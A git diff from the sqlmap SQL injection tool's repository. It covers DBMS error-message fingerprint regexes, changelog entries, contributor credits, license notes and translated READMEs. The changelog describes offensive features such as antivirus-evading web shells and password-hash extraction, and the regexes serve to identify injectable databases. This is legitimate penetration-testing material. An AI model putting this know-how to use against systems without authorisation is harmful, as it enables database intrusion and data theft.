|
|
||||||
|
|
||||||
<dbms value="HSQLDB">
|
|
||||||
<error regexp="Unexpected end of command in statement \["/>
|
|
||||||
<error regexp="Unexpected token.*?in statement \["/>
|
|
||||||
<error regexp="org\.hsqldb\.jdbc"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="H2">
|
|
||||||
<error regexp="org\.h2\.jdbc"/>
|
|
||||||
<error regexp="\[42000-192\]"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="MonetDB">
|
|
||||||
<error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
|
|
||||||
<error regexp="\[MonetDB\]\[ODBC Driver"/>
|
|
||||||
<error regexp="nl\.cwi\.monetdb\.jdbc"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Apache Derby">
|
|
||||||
<error regexp="Syntax error: Encountered"/>
|
|
||||||
<error regexp="org\.apache\.derby"/>
|
|
||||||
<error regexp="ERROR 42X01"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Vertica">
|
|
||||||
<error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
|
|
||||||
<error regexp="/vertica/Parser/scan"/>
|
|
||||||
<error regexp="com\.vertica\.jdbc"/>
|
|
||||||
<error regexp="org\.jkiss\.dbeaver\.ext\.vertica"/>
|
|
||||||
<error regexp="com\.vertica\.dsi\.dataengine"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Mckoi">
|
|
||||||
<error regexp="com\.mckoi\.JDBCDriver"/>
|
|
||||||
<error regexp="com\.mckoi\.database\.jdbc"/>
|
|
||||||
<error regexp="<REGEX_LITERAL>"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Presto">
|
|
||||||
<error regexp="com\.facebook\.presto\.jdbc"/>
|
|
||||||
<error regexp="io\.prestosql\.jdbc"/>
|
|
||||||
<error regexp="com\.simba\.presto\.jdbc"/>
|
|
||||||
<error regexp="UNION query has different number of fields: \d+, \d+"/>
|
|
||||||
<error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Altibase">
|
|
||||||
<error regexp="Altibase\.jdbc\.driver"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="MimerSQL">
|
|
||||||
<error regexp="com\.mimer\.jdbc"/>
|
|
||||||
<error regexp="Syntax error,[^\n]+assumed to mean"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="CrateDB">
|
|
||||||
<error regexp="io\.crate\.client\.jdbc"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Cache">
|
|
||||||
<error regexp="encountered after end of query"/>
|
|
||||||
<error regexp="A comparison operator is required here"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Raima Database Manager">
|
|
||||||
<error regexp="-10048: Syntax error"/>
|
|
||||||
<error regexp="rdmStmtPrepare\(.+?\) returned"/>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<dbms value="Virtuoso">
|
|
||||||
<error regexp="SQ074: Line \d+:"/>
|
|
||||||
<error regexp="SR185: Undefined procedure"/>
|
|
||||||
<error regexp="SQ200: No table "/>
|
|
||||||
<error regexp="Virtuoso S0002 Error"/>
|
|
||||||
<error regexp="\[(Virtuoso Driver|Virtuoso iODBC Driver)\]\[Virtuoso Server\]"/>
|
|
||||||
</dbms>
|
|
||||||
</root>
|
|
||||||
1719
data/xml/queries.xml
1719
data/xml/queries.xml
File diff suppressed because it is too large
Load Diff
@@ -1,33 +1,3 @@
|
|||||||
# Version 1.6 (2022-01-03)
|
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
|
|
||||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)
|
|
||||||
|
|
||||||
# Version 1.5 (2021-01-03)
|
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
|
|
||||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
|
|
||||||
|
|
||||||
# Version 1.4 (2020-01-01)
|
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
|
|
||||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)
|
|
||||||
|
|
||||||
# Version 1.3 (2019-01-05)
|
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
|
|
||||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
|
|
||||||
|
|
||||||
# Version 1.2 (2018-01-08)
|
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
|
|
||||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
|
|
||||||
|
|
||||||
# Version 1.1 (2017-04-07)
|
|
||||||
|
|
||||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
|
|
||||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
|
|
||||||
|
|
||||||
# Version 1.0 (2016-02-27)
|
# Version 1.0 (2016-02-27)
|
||||||
|
|
||||||
* Implemented support for automatic decoding of page content through detected charset.
|
* Implemented support for automatic decoding of page content through detected charset.
|
||||||
@@ -181,7 +151,7 @@
|
|||||||
* Major code cleanup.
|
* Major code cleanup.
|
||||||
* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
|
* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
|
||||||
* Updated user's manual.
|
* Updated user's manual.
|
||||||
* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html.
|
* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
|
||||||
|
|
||||||
# Version 0.8 release candidate (2009-09-21)
|
# Version 0.8 release candidate (2009-09-21)
|
||||||
|
|
||||||
@@ -353,7 +323,7 @@
|
|||||||
* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
|
* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
|
||||||
* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
|
* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
|
||||||
* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
|
* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
|
||||||
* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <https://sqlmap.org/dev/>;
|
* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
|
||||||
* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
|
* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
|
||||||
* Improved logging functionality: passed from banal 'print' to Python native logging library;
|
* Improved logging functionality: passed from banal 'print' to Python native logging library;
|
||||||
* Added support for more than one parameter in `-p` command line option;
|
* Added support for more than one parameter in `-p` command line option;
|
||||||
|
|||||||
BIN
doc/FAQ.pdf
Normal file
BIN
doc/FAQ.pdf
Normal file
Binary file not shown.
BIN
doc/README.pdf
Normal file
BIN
doc/README.pdf
Normal file
Binary file not shown.
@@ -112,9 +112,6 @@ Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
|
|||||||
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
Thomas Etrillard, <thomas.etrillard(at)synacktiv.com>
|
|
||||||
* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)
|
|
||||||
|
|
||||||
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
||||||
* for suggesting good features
|
* for suggesting good features
|
||||||
|
|
||||||
@@ -151,6 +148,11 @@ Giorgio Fedon, <giorgio.fedon(at)gmail.com>
|
|||||||
Kasper Fons, <thefeds(at)mail.dk>
|
Kasper Fons, <thefeds(at)mail.dk>
|
||||||
* for reporting several bugs
|
* for reporting several bugs
|
||||||
|
|
||||||
|
Jose Fonseca, <jose.r.fonseca(at)gmail.com>
|
||||||
|
* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
|
||||||
|
http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
|
||||||
|
http://code.google.com/p/jrfonseca/wiki/XDot
|
||||||
|
|
||||||
Alan Franzoni, <alan.franzoni(at)gmail.com>
|
Alan Franzoni, <alan.franzoni(at)gmail.com>
|
||||||
* for helping out with Python subprocess library
|
* for helping out with Python subprocess library
|
||||||
|
|
||||||
@@ -200,7 +202,7 @@ Tate Hansen, <tate(at)clearnetsec.com>
|
|||||||
Mario Heiderich, <mario.heiderich(at)gmail.com>
|
Mario Heiderich, <mario.heiderich(at)gmail.com>
|
||||||
Christian Matthies, <ch0012(at)gmail.com>
|
Christian Matthies, <ch0012(at)gmail.com>
|
||||||
Lars H. Strojny, <lars(at)strojny.net>
|
Lars H. Strojny, <lars(at)strojny.net>
|
||||||
* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS
|
* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
|
||||||
|
|
||||||
Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
|
Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
|
||||||
* for reporting a bug
|
* for reporting a bug
|
||||||
@@ -315,9 +317,6 @@ Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
|
|||||||
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
||||||
* for contributing a Portuguese translation of README.md
|
* for contributing a Portuguese translation of README.md
|
||||||
|
|
||||||
Francesco Marano, <francesco.mrn24(at)gmail.com>
|
|
||||||
* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload
|
|
||||||
|
|
||||||
Ahmad Maulana, <matdhule(at)gmail.com>
|
Ahmad Maulana, <matdhule(at)gmail.com>
|
||||||
* for contributing a tamper script halfversionedmorekeywords.py
|
* for contributing a tamper script halfversionedmorekeywords.py
|
||||||
|
|
||||||
@@ -487,9 +486,6 @@ Marek Sarvas, <marek.sarvas(at)gmail.com>
|
|||||||
Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
|
Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
Henri Salo <henri(at)nerv.fi>
|
|
||||||
* for a donation
|
|
||||||
|
|
||||||
Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
|
Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
@@ -569,9 +565,6 @@ Efrain Torres, <et(at)metasploit.com>
|
|||||||
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
|
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
|
||||||
* for his great Metasploit WMAP Framework
|
* for his great Metasploit WMAP Framework
|
||||||
|
|
||||||
Jennifer Torres, <jtorresf42(at)gmail.com>
|
|
||||||
* for contributing a tamper script luanginx.py
|
|
||||||
|
|
||||||
Sandro Tosi, <matrixhasu(at)gmail.com>
|
Sandro Tosi, <matrixhasu(at)gmail.com>
|
||||||
* for helping to create sqlmap Debian package correctly
|
* for helping to create sqlmap Debian package correctly
|
||||||
|
|
||||||
@@ -734,9 +727,6 @@ rmillet, <rmillet42(at)gmail.com>
|
|||||||
Rub3nCT, <rub3nct(at)gmail.com>
|
Rub3nCT, <rub3nct(at)gmail.com>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
sapra, <amanistaken(at)gmail.com>
|
|
||||||
* for helping out with Python multiprocessing library on MacOS
|
|
||||||
|
|
||||||
shiftzwei, <shiftzwei(at)gmail.com>
|
shiftzwei, <shiftzwei(at)gmail.com>
|
||||||
* for reporting a couple of bugs
|
* for reporting a couple of bugs
|
||||||
|
|
||||||
@@ -771,12 +761,6 @@ ultramegaman, <seclists(at)ultramegaman.com>
|
|||||||
Vinicius, <viniciusmaxdaloop(at)gmail.com>
|
Vinicius, <viniciusmaxdaloop(at)gmail.com>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
virusdefender
|
|
||||||
* for contributing WAF scripts safeline.py
|
|
||||||
|
|
||||||
w8ay
|
|
||||||
* for contributing an implementation for chunked transfer-encoding (switch --chunked)
|
|
||||||
|
|
||||||
wanglei, <wanglei(at)17uxi.cn>
|
wanglei, <wanglei(at)17uxi.cn>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
|||||||
@@ -2,22 +2,27 @@ This file lists bundled packages and their associated licensing terms.
|
|||||||
|
|
||||||
# BSD
|
# BSD
|
||||||
|
|
||||||
* The `Ansistrm` library located under `thirdparty/ansistrm/`.
|
* The Ansistrm library located under thirdparty/ansistrm/.
|
||||||
Copyright (C) 2010-2012, Vinay Sajip.
|
Copyright (C) 2010-2012, Vinay Sajip.
|
||||||
* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`.
|
* The Beautiful Soup library located under thirdparty/beautifulsoup/.
|
||||||
Copyright (C) 2004-2010, Leonard Richardson.
|
Copyright (C) 2004-2010, Leonard Richardson.
|
||||||
* The `ClientForm` library located under `thirdparty/clientform/`.
|
* The ClientForm library located under thirdparty/clientform/.
|
||||||
Copyright (C) 2002-2007, John J. Lee.
|
Copyright (C) 2002-2007, John J. Lee.
|
||||||
Copyright (C) 2005, Gary Poster.
|
Copyright (C) 2005, Gary Poster.
|
||||||
Copyright (C) 2005, Zope Corporation.
|
Copyright (C) 2005, Zope Corporation.
|
||||||
Copyright (C) 1998-2000, Gisle Aas.
|
Copyright (C) 1998-2000, Gisle Aas.
|
||||||
* The `Colorama` library located under `thirdparty/colorama/`.
|
* The Colorama library located under thirdparty/colorama/.
|
||||||
Copyright (C) 2013, Jonathan Hartley.
|
Copyright (C) 2013, Jonathan Hartley.
|
||||||
* The `Fcrypt` library located under `thirdparty/fcrypt/`.
|
* The Fcrypt library located under thirdparty/fcrypt/.
|
||||||
Copyright (C) 2000, 2001, 2004 Carey Evans.
|
Copyright (C) 2000, 2001, 2004 Carey Evans.
|
||||||
* The `PrettyPrint` library located under `thirdparty/prettyprint/`.
|
* The Odict library located under thirdparty/odict/.
|
||||||
|
Copyright (C) 2005, Nicola Larosa, Michael Foord.
|
||||||
|
* The Oset library located under thirdparty/oset/.
|
||||||
|
Copyright (C) 2010, BlueDynamics Alliance, Austria.
|
||||||
|
Copyright (C) 2009, Raymond Hettinger, and others.
|
||||||
|
* The PrettyPrint library located under thirdparty/prettyprint/.
|
||||||
Copyright (C) 2010, Chris Hall.
|
Copyright (C) 2010, Chris Hall.
|
||||||
* The `SocksiPy` library located under `thirdparty/socks/`.
|
* The SocksiPy library located under thirdparty/socks/.
|
||||||
Copyright (C) 2006, Dan-Haim.
|
Copyright (C) 2006, Dan-Haim.
|
||||||
|
|
||||||
````
|
````
|
||||||
@@ -46,13 +51,17 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|||||||
|
|
||||||
# LGPL
|
# LGPL
|
||||||
|
|
||||||
* The `Chardet` library located under `thirdparty/chardet/`.
|
* The Chardet library located under thirdparty/chardet/.
|
||||||
Copyright (C) 2008, Mark Pilgrim.
|
Copyright (C) 2008, Mark Pilgrim.
|
||||||
* The `KeepAlive` library located under `thirdparty/keepalive/`.
|
* The Gprof2dot library located under thirdparty/gprof2dot/.
|
||||||
|
Copyright (C) 2008-2009, Jose Fonseca.
|
||||||
|
* The KeepAlive library located under thirdparty/keepalive/.
|
||||||
Copyright (C) 2002-2003, Michael D. Stenner.
|
Copyright (C) 2002-2003, Michael D. Stenner.
|
||||||
* The `MultipartPost` library located under `thirdparty/multipart/`.
|
* The MultipartPost library located under thirdparty/multipart/.
|
||||||
Copyright (C) 2006, Will Holcomb.
|
Copyright (C) 2006, Will Holcomb.
|
||||||
* The `icmpsh` tool located under `extra/icmpsh/`.
|
* The XDot library located under thirdparty/xdot/.
|
||||||
|
Copyright (C) 2008, Jose Fonseca.
|
||||||
|
* The icmpsh tool located under extra/icmpsh/.
|
||||||
Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
|
Copyright (C) 2010, Nico Leidecker, Bernardo Damele.
|
||||||
|
|
||||||
````
|
````
|
||||||
@@ -225,7 +234,7 @@ Library.
|
|||||||
|
|
||||||
# PSF
|
# PSF
|
||||||
|
|
||||||
* The `Magic` library located under `thirdparty/magic/`.
|
* The Magic library located under thirdparty/magic/.
|
||||||
Copyright (C) 2011, Adam Hupp.
|
Copyright (C) 2011, Adam Hupp.
|
||||||
|
|
||||||
````
|
````
|
||||||
@@ -270,15 +279,9 @@ be bound by the terms and conditions of this License Agreement.
|
|||||||
|
|
||||||
# MIT
|
# MIT
|
||||||
|
|
||||||
* The `bottle` web framework library located under `thirdparty/bottle/`.
|
* The bottle web framework library located under thirdparty/bottle/.
|
||||||
Copyright (C) 2012, Marcel Hellkamp.
|
Copyright (C) 2012, Marcel Hellkamp.
|
||||||
* The `identYwaf` library located under `thirdparty/identywaf/`.
|
* The Termcolor library located under thirdparty/termcolor/.
|
||||||
Copyright (C) 2019-2020, Miroslav Stampar.
|
|
||||||
* The `ordereddict` library located under `thirdparty/odict/`.
|
|
||||||
Copyright (C) 2009, Raymond Hettinger.
|
|
||||||
* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`.
|
|
||||||
Copyright (C) 2010-2018, Benjamin Peterson.
|
|
||||||
* The `Termcolor` library located under `thirdparty/termcolor/`.
|
|
||||||
Copyright (C) 2008-2011, Volvox Development Team.
|
Copyright (C) 2008-2011, Volvox Development Team.
|
||||||
|
|
||||||
````
|
````
|
||||||
@@ -305,7 +308,7 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
|||||||
|
|
||||||
# Public domain
|
# Public domain
|
||||||
|
|
||||||
* The `PyDes` library located under `thirdparty/pydes/`.
|
* The PyDes library located under thirdparty/pydes/.
|
||||||
Copyleft 2009, Todd Whiteman.
|
Copyleft 2009, Todd Whiteman.
|
||||||
* The `win_inet_pton` library located under `thirdparty/wininetpton/`.
|
* The win_inet_pton library located under thirdparty/wininetpton/.
|
||||||
Copyleft 2014, Ryan Vennell.
|
Copyleft 2014, Ryan Vennell.
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
||||||
|
|
||||||
@@ -20,7 +20,7 @@ sqlmap e инструмент за тестване и проникване, с
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap работи самостоятелно с [Python](https://www.python.org/download/) версия **2.6**, **2.7** и **3.x** на всички платформи.
|
sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
|
||||||
|
|
||||||
Използване
|
Използване
|
||||||
----
|
----
|
||||||
@@ -39,12 +39,12 @@ sqlmap работи самостоятелно с [Python](https://www.python.or
|
|||||||
Връзки
|
Връзки
|
||||||
----
|
----
|
||||||
|
|
||||||
* Начална страница: https://sqlmap.org
|
* Начална страница: http://sqlmap.org
|
||||||
* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
|
* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
|
* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
|
|||||||
@@ -1,49 +0,0 @@
|
|||||||
# sqlmap 
|
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
|
||||||
|
|
||||||
sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen.
|
|
||||||
|
|
||||||
Screenshots
|
|
||||||
---
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
Du kannst eine [Sammlung von Screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), die einige der Funktionen demonstrieren, auf dem Wiki einsehen.
|
|
||||||
|
|
||||||
Installation
|
|
||||||
---
|
|
||||||
|
|
||||||
[Hier](https://github.com/sqlmapproject/sqlmap/tarball/master) kannst du das neueste TAR-Archiv herunterladen und [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) das neueste ZIP-Archiv.
|
|
||||||
|
|
||||||
Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.com/sqlmapproject/sqlmap) Repository klonst:
|
|
||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
|
||||||
|
|
||||||
sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform.
|
|
||||||
|
|
||||||
Benutzung
|
|
||||||
---
|
|
||||||
|
|
||||||
Um eine Liste aller grundsätzlichen Optionen und Switches zu bekommen, nutze diesen Befehl:
|
|
||||||
|
|
||||||
python sqlmap.py -h
|
|
||||||
|
|
||||||
Um eine Liste alles Optionen und Switches zu bekommen, nutze diesen Befehl:
|
|
||||||
|
|
||||||
python sqlmap.py -hh
|
|
||||||
|
|
||||||
Ein Probelauf ist [hier](https://asciinema.org/a/46601) zu finden. Um einen Überblick über sqlmap's Fähigkeiten, unterstütze Funktionen und eine Erklärung aller Optionen und Switches, zusammen mit Beispielen, zu erhalten, wird das [Benutzerhandbuch](https://github.com/sqlmapproject/sqlmap/wiki/Usage) empfohlen.
|
|
||||||
|
|
||||||
Links
|
|
||||||
---
|
|
||||||
|
|
||||||
* Webseite: https://sqlmap.org
|
|
||||||
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
|
||||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
|
||||||
* Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues
|
|
||||||
* Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki
|
|
||||||
* Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
|
||||||
* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
|
||||||
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap 
|
# sqlmap
|
||||||
|
|
||||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
||||||
|
|
||||||
@@ -19,7 +19,7 @@ Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https:/
|
|||||||
|
|
||||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.6**, **2.7** y **3.x** en cualquier plataforma.
|
sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma.
|
||||||
|
|
||||||
Uso
|
Uso
|
||||||
---
|
---
|
||||||
@@ -38,12 +38,12 @@ Para obtener una visión general de las capacidades de sqlmap, así como un list
|
|||||||
Enlaces
|
Enlaces
|
||||||
---
|
---
|
||||||
|
|
||||||
* Página principal: https://sqlmap.org
|
* Página principal: http://sqlmap.org
|
||||||
* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
|
* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
